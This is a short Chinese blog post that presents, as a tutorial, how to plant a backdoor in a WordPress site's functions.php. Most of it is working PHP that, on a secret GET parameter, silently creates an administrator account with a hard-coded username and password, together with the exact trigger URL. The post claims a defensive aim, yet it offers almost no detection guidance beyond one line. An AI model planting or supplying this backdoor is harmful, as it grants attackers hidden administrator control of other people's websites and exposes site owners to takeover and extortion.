[web安全]WordPress程序增加网站后门

肯定有很多人网站或者服务器被黑过，但是刚接触网站时并不懂编程，所以无法自己排除后门，今天给大家带来的是如何在Wordpress程序里增加后门的教程！该教程并不是教会大家如何给程序留后门或者干坏事，而是教大家如何正确的清除后门，正确的认识后门！

代码：

<?php
add_action( 'wp_head', 'my_backdoor' );
 
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'backdoor' ) ) {
            $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

functions.php文件中添加以上代码，就可以给 WordPress 添加一个能够创建管理员的后门，只需访问 http://

xxx.xxx.com/?backdoor=go，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd!” 的管理员。

大家在代码中见到该类型的PHP语句特征记得自我清除一下，避免被他人勒索或被清站的风险！

小编说：

肯定会有很多网友说如果说出来了，大家肯定都会去给网站源码加后门。其实大家对后门的认识并不大，只有真正懂得如何给网站加后门了，才可以正确理解和自我清除后门，以及遇到后门时该如何解决。